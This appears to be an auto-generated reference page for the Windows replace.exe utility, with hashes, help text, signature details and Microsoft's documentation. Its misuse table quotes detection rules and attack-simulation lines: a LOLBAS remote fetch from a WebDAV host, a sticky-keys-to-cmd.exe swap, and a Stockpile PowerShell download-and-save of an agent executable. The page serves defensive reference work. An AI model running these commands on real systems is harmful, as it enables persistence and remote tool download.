replace.exe

  • File Path: C:\WINDOWS\system32\replace.exe
  • Description: Replace File Utility

Hashes

| Type | Hash |
| --- | --- |
| MD5 | C429130CFDB28EDD418FD4C80434299F |
| SHA1 | BA9CE9FE8C55C68393F261C1F49A52C5463C17DC |
| SHA256 | EB7487C0229B7DDF4B1C29312E5DDFCE90D71836B3A1E73ACD1AEC0FFEE301F7 |
| SHA384 | 52862FCE7093B2C2A1BC239A24AC1FACA084DD511536D4EAEA3F34B785ECBEFC540C367AEAFCE6F112FB1B199AA4C666 |
| SHA512 | BAD2DE5FDB4F0B9D2D77C43477A00808B09FCB05127FC4A266866E0D8E543FE8AC7E9AA7DA4BEDE9E909CAFA5C1C48BAF586994C7D5E0C66FC42C6E425D73D32 |
| SSDEEP | 384:aPqTz3ULYzloMqsGRegTWpF56L1m9Acd/1YdYqxn7ptW1h/W:aPqULYzlo+Ggzwm2cd/1YdY4pE |
| IMP | B8B8661E3130FA043E26C71CD60FB430 |
| PESHA1 | B119C127971ED55E0983AAB5ED949F66CF8FFC6B |
| PE256 | 23C51A5B6C5C62E908507425E1C60D15E8AEB110B25C035A5206E675A1314FDA |

Runtime Data

Usage (stdout):

Replaces files.

REPLACE [drive1:][path1]filename [drive2:][path2] [/A] [/P] [/R] [/W]
REPLACE [drive1:][path1]filename [drive2:][path2] [/P] [/R] [/S] [/W] [/U]

  [drive1:][path1]filename Specifies the source file or files.
  [drive2:][path2]         Specifies the directory where files are to be
                           replaced.
  /A                       Adds new files to destination directory. Cannot
                           use with /S or /U switches.
  /P                       Prompts for confirmation before replacing a file or
                           adding a source file.
  /R                       Replaces read-only files as well as unprotected
                           files.
  /S                       Replaces files in all subdirectories of the
                           destination directory. Cannot use with the /A
                           switch.
  /W                       Waits for you to insert a disk before beginning.
  /U                       Replaces (updates) only files that are older than
                           source files. Cannot use with the /A switch.

Usage (stderr):

Invalid switch - --help

Loaded Modules:

Path
C:\WINDOWS\System32\KERNEL32.DLL
C:\WINDOWS\System32\KERNELBASE.dll
C:\WINDOWS\SYSTEM32\ntdll.dll
C:\WINDOWS\system32\replace.exe

Signature

  • Status: Signature verified.
  • Serial: 33000002ED2C45E4C145CF48440000000002ED
  • Thumbprint: 312860D2047EB81F8F58C29FF19ECDB4C634CF6A
  • Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
  • Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US

File Metadata

  • Original Filename: REPLACE.EXE.MUI
  • Product Name: Microsoft Windows Operating System
  • Company Name: Microsoft Corporation
  • File Version: 10.0.22000.1 (WinBuild.160101.0800)
  • Product Version: 10.0.22000.1
  • Language: English (United States)
  • Legal Copyright: Microsoft Corporation. All rights reserved.
  • Machine Type: 64-bit

File Scan

  • VirusTotal Detections: 0/72
  • VirusTotal Link: https://www.virustotal.com/gui/file/eb7487c0229b7ddf4b1c29312e5ddfce90d71836b3a1e73acd1aec0ffee301f7/detection

Possible Misuse

The following table contains possible examples of replace.exe being misused. While replace.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

| Source | Source File | Example | License |
| --- | --- | --- | --- |
| sigma | gcp_kubernetes_admission_controller.yml | - replace | DRL 1.0 |
| sigma | cisco_cli_moving_data.yml | - 'configure replace' | DRL 1.0 |
| sigma | posh_ps_susp_wallpaper.yml | title: Replace Desktop Wallpaper by Powershell | DRL 1.0 |
| sigma | proc_creation_win_lolbas_replace.yml | title: Suspicious Replace.exe Execution | DRL 1.0 |
| sigma | proc_creation_win_lolbas_replace.yml | description: Replace.exe is used to replace file with another file | DRL 1.0 |
| sigma | proc_creation_win_lolbas_replace.yml | - https://lolbas-project.github.io/lolbas/Binaries/Replace/ | DRL 1.0 |
| sigma | proc_creation_win_lolbas_replace.yml | - 'replace ' | DRL 1.0 |
| LOLBAS | AcroRd32.yml | - Command: Replace C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe by your binary | |
| LOLBAS | ROCCAT_Swarm.yml | - Command: Replace ROCCAT_Swarm_Monitor.exe with your binary.exe | |
| LOLBAS | Replace.yml | Name: Replace.exe | |
| LOLBAS | Replace.yml | Description: Used to replace file with another file | |
| LOLBAS | Replace.yml | - Command: replace.exe C:\Source\File.cab C:\Destination /A | |
| LOLBAS | Replace.yml | - Command: replace.exe \\webdav.host.com\foo\bar.exe c:\outdir /A | |
| LOLBAS | Replace.yml | - Path: C:\Windows\System32\replace.exe | |
| LOLBAS | Replace.yml | - Path: C:\Windows\SysWOW64\replace.exe | |
| LOLBAS | Replace.yml | - IOC: Replace.exe retrieving files from remote server | |
| malware-ioc | misp_invisimole.json | "description": "Shortcuts or symbolic links are ways of referencing other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process. Adversaries could use shortcuts to execute their tools for persistence. They may create a new shortcut as a means of indirection that may use [Masquerading](https://attack.mitre.org/techniques/T1036) to look like a legitimate program. Adversaries could also edit the target path or entirely replace an existing shortcut so their tools will be executed instead of the intended legitimate program.", | © ESET 2014-2018 |
| malware-ioc | nouns.txt | replace | © ESET 2014-2018 |
| malware-ioc | stantinko | var c = a[b].toLocaleLowerCase().replace(/(\n)/g, " ").replace(/(\r)/g, ""); | © ESET 2014-2018 |
| malware-ioc | stantinko | a = a.toLowerCase().replace(/(\n)/g, " ").replace(/(\r)/g, ""); | © ESET 2014-2018 |
| malware-ioc | misp-turla-outlook-event.json | "description": "The Microsoft Component Object Model (COM) is a system within Windows to enable interaction between software components through the operating system.[[Citation: Microsoft Component Object Model]] Adversaries can use this system to insert malicious code that can be executed in place of legitimate software through hijacking the COM references and relationships as a means for persistence. Hijacking a COM object requires a change in the Windows Registry to replace a reference to a legitimate system component which may cause that component to not work when executed. When that system component is executed through normal system operation the adversary's code will be executed instead.[[Citation: GDATA COM Hijacking]] An adversary is likely to hijack objects that are used frequently enough to maintain a consistent level of persistence, but are unlikely to break noticeable functionality within the system as to avoid system instability that could lead to detection.\n\nDetection: There are opportunities to detect COM hijacking by searching for Registry references that have been replaced and through Registry operations replacing know binary paths with unknown paths. Even though some third party applications define user COM objects, the presence of objects within <code>HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\<\/code> may be anomalous and should be investigated since user objects will be loaded prior to machine objects in <code>HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\<\/code>.[[Citation: Endgame COM Hijacking]] Registry entries for existing COM objects may change infrequently. When an entry with a known good path and binary is replaced or changed to an unusual value to point to an unknown binary in a new location, then it may indicate suspicious behavior and should be investigated. Likewise, if software DLL loads are collected and analyzed, any unusual DLL load that can be correlated with a COM object Registry modification may indicate COM hijacking has been performed.\n\nPlatforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10\n\nData Sources: Windows Registry, DLL monitoring, Loaded DLLs\n\nContributors: ENDGAME", | © ESET 2014-2018 |
| malware-ioc | windigo | replace: | © ESET 2014-2018 |
| atomic-red-team | problem_report.md | ℹ Please replace this with what you did. | MIT License. © 2018 Red Canary |
| atomic-red-team | problem_report.md | ℹ Please replace this with what you expected to happen. | MIT License. © 2018 Red Canary |
| atomic-red-team | problem_report.md | ℹ Please replace this with of what happened instead. | MIT License. © 2018 Red Canary |
| atomic-red-team | index.md | - Atomic Test #2: Replace binary of sticky keys [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | index.md | - Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux] | MIT License. © 2018 Red Canary |
| atomic-red-team | index.md | - Atomic Test #1: Replace Desktop Wallpaper [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | linux-index.md | - Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux] | MIT License. © 2018 Red Canary |
| atomic-red-team | macos-index.md | - Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux] | MIT License. © 2018 Red Canary |
| atomic-red-team | windows-index.md | - Atomic Test #2: Replace binary of sticky keys [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | windows-index.md | - Atomic Test #1: Replace Desktop Wallpaper [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | T1003.md | $cleanupUpdatedValue = $cleanupUpdatedValue -replace ',NPPSpy','' | MIT License. © 2018 Red Canary |
| atomic-red-team | T1053.003.md | - Atomic Test #1 - Cron - Replace crontab with referenced file | MIT License. © 2018 Red Canary |
| atomic-red-team | T1053.003.md | ## Atomic Test #1 - Cron - Replace crontab with referenced file | MIT License. © 2018 Red Canary |
| atomic-red-team | T1070.006.md | \| target_date_time \| Date/time to replace original timestamps with \| String \| 01/01/1970 00:00:00\| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1098.md | $account = $member.Name -replace ".+\","" # strip computername\ | MIT License. © 2018 Red Canary |
| atomic-red-team | src | - If Excel asks "A file name '…' already exists in this location. Do you want to replace it?", click Yes. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1204.002.md | $macroCode = $macroCode -replace 'serverPath', $URL -replace 'fileName', "#{file_name}" | MIT License. © 2018 Red Canary |
| atomic-red-team | T1221.md | <blockquote>Adversaries may create or modify references in Office document templates to conceal malicious code or force authentication attempts. Microsoft's Office Open XML (OOXML) specification defines an XML-based format for Office documents (.docx, xlsx, .pptx) to replace older binary formats (.doc, .xls, .ppt). OOXML files are packed together ZIP archives compromised of various XML files, referred to as parts, containing properties that collectively define how a document is rendered. (Citation: Microsoft Open XML July 2017) | MIT License. © 2018 Red Canary |
| atomic-red-team | T1491.001.md | - Atomic Test #1 - Replace Desktop Wallpaper | MIT License. © 2018 Red Canary |
| atomic-red-team | T1491.001.md | ## Atomic Test #1 - Replace Desktop Wallpaper | MIT License. © 2018 Red Canary |
| atomic-red-team | T1546.008.md | - Atomic Test #2 - Replace binary of sticky keys | MIT License. © 2018 Red Canary |
| atomic-red-team | T1546.008.md | ## Atomic Test #2 - Replace binary of sticky keys | MIT License. © 2018 Red Canary |
| atomic-red-team | T1546.008.md | Replace sticky keys binary (sethc.exe) with cmd.exe | MIT License. © 2018 Red Canary |
| atomic-red-team | T1546.015.md | Adversaries can use the COM system to insert malicious code that can be executed in place of legitimate software through hijacking the COM references and relationships as a means for persistence. Hijacking a COM object requires a change in the Registry to replace a reference to a legitimate system component which may cause that component to not work when executed. When that system component is executed through normal system operation the adversary's code will be executed instead.(Citation: GDATA COM Hijacking) An adversary is likely to hijack objects that are used frequently enough to maintain a consistent level of persistence, but are unlikely to break noticeable functionality within the system as to avoid system instability that could lead to detection. </blockquote> | MIT License. © 2018 Red Canary |
| atomic-red-team | T1547.009.md | Adversaries could use shortcuts to execute their tools for persistence. They may create a new shortcut as a means of indirection that may use Masquerading to look like a legitimate program. Adversaries could also edit the target path or entirely replace an existing shortcut so their tools will be executed instead of the intended legitimate program.</blockquote> | MIT License. © 2018 Red Canary |
| atomic-red-team | T1558.001.md | "@ -Replace "DOMAIN_SID", $domain_sid \| Out-File -Encoding OEM $env:TEMP\golden.bat | MIT License. © 2018 Red Canary |
| atomic-red-team | T1558.001.md | "@ -Replace "kirbifile", $filename \| Out-File -Encoding OEM $env:TEMP\golden.bat | MIT License. © 2018 Red Canary |
| atomic-red-team | T1564.md | $macro = $macro -replace "aREPLACEMEa", "PathToAtomicsFolder\T1564\bin\extractme.bin" | MIT License. © 2018 Red Canary |
| atomic-red-team | T1574.001.md | If a search order-vulnerable program is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation from user to administrator or SYSTEM or from administrator to SYSTEM, depending on the program. Programs that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace.</blockquote> | MIT License. © 2018 Red Canary |
| signature-base | [apt_apt29grizzly_steppe.yar](https://github.com/Neo23x0/signature-base/blob/master/yara/apt_apt29_grizzly_steppe.yar) | $s2 = "Repeat last find command)Replace specific text with different text" fullword wide | CC BY-NC 4.0 |
| signature-base | apt_hafnium.yar | $s3 = "Encoding.UTF8.GetString(FromBase64String(str.Replace(" ascii | CC BY-NC 4.0 |
| signature-base | apt_oilrig.yar | $x1 = "Get-Content $env:Public\Libraries\update.vbs) -replace" ascii | CC BY-NC 4.0 |
| signature-base | apt_oilrig.yar | $x3 = "CreateObject("WScript.Shell").Run Replace(DownloadExecute,"-","bat")" fullword ascii | CC BY-NC 4.0 |
| signature-base | apt_oilrig.yar | $s4 = "') -replace '',('DNS'+$id) \| " fullword ascii | CC BY-NC 4.0 |
| signature-base | apt_oilrig.yar | $s7 = "') -replace '',('HTP'+$id) \| " fullword ascii | CC BY-NC 4.0 |
| signature-base | apt_oilrig.yar | $x1 = "wss.Run "powershell.exe " & Chr(34) & "& {(Get-Content $env:Public\Libraries\update.vbs) -replace '_',(Get-Random) \| Set-C" ascii | CC BY-NC 4.0 |
| signature-base | apt_oilrig.yar | $x1 = "(Get-Content $env:Public\Libraries\dns.ps1) -replace ('#'+'##'),$botid \| Set-Content $env:Public\Libraries\dns.ps1" fullword ascii | CC BY-NC 4.0 |
| signature-base | apt_oilrig.yar | $one5 = "cu = Replace(cu, "$", "")" ascii wide | CC BY-NC 4.0 |
| signature-base | apt_winnti_hdroot.yar | $s8 = "tera replace dll config" fullword ascii | CC BY-NC 4.0 |
| signature-base | cn_pentestset_webshells.yar | $s2 = "strReturn=Replace(strReturn,chr(43),"%2B") 'JMDCW" fullword ascii | CC BY-NC 4.0 |
| signature-base | crime_emotet.yar | note = "The binary will replace the original emotet by copying it to a quarantine. It also contains a routine to perform a self-deinstallation on the 25th of April 2021. The three-month timeframe between rollout and self-deinstallation was chosen primarily for evidence purposes as well as to allow remediation." | CC BY-NC 4.0 |
| signature-base | crime_goldeneye.yar | $x1 = "fso.GetTempName();tmp_path = tmp_path.replace('.tmp', '.exe')" fullword ascii | CC BY-NC 4.0 |
| signature-base | gen_cert_payloads.yar | $fp1 = "replace it with the PEM-encoded root certificate" | CC BY-NC 4.0 |
| signature-base | gen_fireeye_redteam_tools.yar | $s2 = "[1].replace('unsigned char buf[] = "'" | CC BY-NC 4.0 |
| signature-base | gen_invoke_thehash.yar | $s1 = "$process_ID = $process_ID -replace "-00-00","" " fullword ascii | CC BY-NC 4.0 |
| signature-base | gen_mimikatz.yar | $x9 = "\ Password replace ->" fullword wide ascii | CC BY-NC 4.0 |
| signature-base | gen_powershell_empire.yar | $s3 = "$PersistantScript = $PersistantScript.ToString().Replace('EXECUTEFUNCTION', "$PersistenceScriptName -Persist")" fullword ascii | CC BY-NC 4.0 |
| signature-base | gen_susp_js_obfuscatorio.yar | $c4 = ")'replace';var" | CC BY-NC 4.0 |
| signature-base | gen_webshells.yar | $gen_bit_sus2 = /.replace(\/\w\/g/ nocase wide ascii | CC BY-NC 4.0 |
| signature-base | gen_webshells.yar | $m_multi_one1 = "Replace(" wide ascii | CC BY-NC 4.0 |
| signature-base | gen_webshells.yar | $m_multi_four2 = ".Replace(" wide ascii | CC BY-NC 4.0 |
| signature-base | gen_webshells.yar | $oo2 = "/").Replace("/" wide ascii | CC BY-NC 4.0 |
| signature-base | gen_webshells.yar | $asp_gen_sus2 = /.replace(\/\w\/g/ nocase wide ascii | CC BY-NC 4.0 |
| signature-base | thor-webshells.yar | $s3 = "MorfiCoder=Replace(Replace(StrReverse(Code),"//",""""),"\*\",vbCrlf)" fullword | CC BY-NC 4.0 |
| signature-base | thor-webshells.yar | $s4 = "echo " <a href=""/"&encodeForUrl(theHref,false)&""" target=_blank>"&replace" | CC BY-NC 4.0 |
| signature-base | thor-webshells.yar | $s8 = "theHref=mid(replace(lcase(list.path),lcase(server.mapPath("/")),""),2)" | CC BY-NC 4.0 |
| signature-base | thor-webshells.yar | $s3 = "echo " <a href=""/"&encodeForUrl(theHref,false)&""" target=_blank>"&replace" | CC BY-NC 4.0 |
| signature-base | thor-webshells.yar | $s9 = "theHref=mid(replace(lcase(list.path),lcase(server.mapPath("/")),""),2)" | CC BY-NC 4.0 |
| signature-base | thor-webshells.yar | $s3 = "If ProxyData <> "" Then ProxyData = Replace(ProxyData, DATA_SEPERATOR, " ")" | CC BY-NC 4.0 |
| signature-base | thor-webshells.yar | $s7 = "theHref=encodeForUrl(mid(replace(lcase(list.path),lcase(server.mapPath("/")),"")" | CC BY-NC 4.0 |
| signature-base | thor-webshells.yar | $s8 = "Obviously you replace the ip address with that of the target." | CC BY-NC 4.0 |
| stockpile | 3734aa1e-c536-42b3-8912-4c91b8bdce90.yml | ($name=$wc.ResponseHeaders["Content-Disposition"].Substring($wc.ResponseHeaders["Content-Disposition"].IndexOf("filename=")+9).Replace(""","")) | [Apache-2.0](https://github.com/mitre/stockpile/blob/master/LICENSE) |
| [stockpile](https://github.com/mitre/stockpile) | [52771610-2322-44cf-816b-a7df42b4c086.yml](https://github.com/mitre/stockpile/blob/master/data/abilities/persistence/52771610-2322-44cf-816b-a7df42b4c086.yml) | name: Replace a service binary with alternate binary | [Apache-2.0](https://github.com/mitre/stockpile/blob/master/LICENSE) |
| [stockpile](https://github.com/mitre/stockpile) | [e3db134c-4aed-4c5a-9607-c50183c9ef9e.yml](https://github.com/mitre/stockpile/blob/master/data/abilities/privilege-escalation/e3db134c-4aed-4c5a-9607-c50183c9ef9e.yml) | $url="#{server}/file/download"; $wc=New-Object System.Net.WebClient; $wc.Headers.add("platform","windows"); $wc.Headers.add("file","sandcat.go"); $data=$wc.DownloadData($url); $name=$wc.ResponseHeaders["Content-Disposition"].Substring($wc.ResponseHeaders["Content-Disposition"].IndexOf("filename=")+9).Replace(""",""); [io.file]::WriteAllBytes("C:\Users\Public\$name.exe",$data); | Apache-2.0 |
| stockpile | e99cce5c-cb7e-4a6e-8a09-1609a221b90a.yml | $name=$wc.ResponseHeaders["Content-Disposition"].Substring($wc.ResponseHeaders["Content-Disposition"].IndexOf("filename=")+9).Replace(""",""); | Apache-2.0 |

Additional Info*

*The information below is copied from MicrosoftDocs, which is maintained by Microsoft. Available under CC BY 4.0 license.


replace

Replace existing files in a directory. If used with the /a option, this command adds new files to a directory instead of replacing existing files.

Syntax

replace [<drive1>:][<path1>]<filename> [<drive2>:][<path2>] [/a] [/p] [/r] [/w]
replace [<drive1>:][<path1>]<filename> [<drive2>:][<path2>] [/p] [/r] [/s] [/w] [/u]

Parameters

| Parameter | Description |
| --- | --- |
| [<drive1>:][<path1>]<filename> | Specifies the location and name of the source file or set of files. The filename option is required, and can include wildcard characters (* and ?). |
| [<drive2>:][<path2>] | Specifies the location of the destination file. You can't specify a file name for files you replace. If you don't specify a drive or path, this command uses the current drive and directory as the destination. |
| /a | Adds new files to the destination directory instead of replacing existing files. You can't use this command-line option with the /s or /u command-line option. |
| /p | Prompts you for confirmation before replacing a destination file or adding a source file. |
| /r | Replaces Read-only and unprotected files. If you attempt to replace a Read-only file, but you don't specify /r, an error results and stops the replacement operation. |
| /w | Waits for you to insert a disk before the search for source files begins. If you don't specify /w, this command begins replacing or adding files immediately after you press ENTER. |
| /s | Searches all subdirectories in the destination directory and replaces matching files. You can't use /s with the /a command-line option. The command doesn't search subdirectories that are specified in Path1. |
| /u | Replaces only those files on the destination directory that are older than those in the source directory. You can't use /u with the /a command-line option. |
| /? | Displays help at the command prompt. |

Remarks
  • As this command adds or replaces files, the file names appear on the screen. After this command is done, a summary line is displayed in one of the following formats:

    nnn files added
    nnn files replaced
    no file added
    no file replaced
    
  • If you’re using floppy disks and you need to switch disks while running this command, you can specify the /w command-line option so that this command waits for you to switch the disks.

  • You can’t use this command to update hidden files or system files.

  • The following table shows each exit code and a brief description of its meaning:

    | Exit code | Description |
    | --- | --- |
    | 0 | This command successfully replaced or added the files. |
    | 1 | This command encountered an incorrect version of MS-DOS. |
    | 2 | This command couldn't find the source files. |
    | 3 | This command couldn't find the source or destination path. |
    | 5 | The user doesn't have access to the files that you want to replace. |
    | 8 | There is insufficient system memory to carry out the command. |
    | 11 | The user used the wrong syntax on the command line. |

[!NOTE] You can use the ERRORLEVEL parameter on the if command line in a batch program to process exit codes that are returned by this command.

Examples

To update all the versions of a file named Phones.cli (which appear in multiple directories on drive C:), with the latest version of the Phones.cli file from a floppy disk in drive A:, type:

replace a:\phones.cli c:\ /s


MIT License. Copyright (c) 2020-2021 Strontic.